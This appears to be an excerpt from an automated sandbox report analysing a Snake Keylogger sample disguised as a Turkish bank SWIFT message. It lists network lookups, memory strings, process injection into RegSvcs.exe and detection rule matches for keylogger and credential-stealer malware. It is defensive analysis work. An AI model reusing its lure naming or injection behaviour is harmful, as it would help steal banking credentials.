            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.000000000308F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: Ziraat Bankasi Swift Mesaji.exe, ZnbATfUbUgZW.exe.0.drString found in binary or memory: http://insimsniffer.codeplex.com/project/feeds/rss?ProjectRSSFeed=codeplex%3a%2f%2frelease%2finsimsn
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2306180646.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003066000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003082000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003059000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.00000000030BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724

            System Summary

            barindex
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015561088_2_01556108
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155C1908_2_0155C190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155F0078_2_0155F007
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155B3288_2_0155B328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155C4708_2_0155C470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155C7518_2_0155C751
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015567308_2_01556730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015598588_2_01559858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155BBD28_2_0155BBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155CA318_2_0155CA31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01554AD98_2_01554AD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155BEB08_2_0155BEB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015535708_2_01553570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155E5178_2_0155E517
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155E5288_2_0155E528
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0155B4F28_2_0155B4F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05A4A7148_2_05A4A714
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05A4DA208_2_05A4DA20
            Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1764
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000000.2043677447.0000000000A94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXfbOZ.exe: vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2306180646.0000000002E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2310971253.00000000057FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXfbOZ.exe: vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.00000000040E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2304936787.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2306180646.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFlatForm.dll2 vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exeBinary or memory string: OriginalFilenameXfbOZ.exe: vs Ziraat Bankasi Swift Mesaji.exe
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, -j-.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, -j-.csBase64 encoded string: 'k9cni+136fkG8JZl31TcnEVMUE4/RPUtZ3iAqQrRpmlmCYstMl+esWZ5azHUhA4x'
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, -j-.csBase64 encoded string: 'k9cni+136fkG8JZl31TcnEVMUE4/RPUtZ3iAqQrRpmlmCYstMl+esWZ5azHUhA4x'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
